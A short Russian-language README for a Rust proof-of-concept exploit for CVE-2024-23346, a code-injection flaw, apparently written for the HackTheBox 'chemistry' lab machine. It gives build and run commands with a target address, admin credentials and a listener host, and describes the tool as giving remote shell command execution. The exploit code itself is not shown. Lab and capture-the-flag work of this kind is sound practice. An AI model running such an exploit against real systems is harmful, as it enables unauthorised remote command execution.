
Эксплойт на Rust для CVE-2024-23346, работающий как «терминал» (протестировано на chemistry.htb)
Скрипт эксплойта на Rust для CVE-2024-23346.
Как показано ниже, POC использует уязвимость внедрения кода и выполняет удалённые команды оболочки, как в терминале.
Шаги для запуска эксплойта:
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19ИЛИ
cargo build -r (бинарный файл будет в target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19Скрипт эксплойта вдохновлён экспертом по Python-скриптам MAWK0235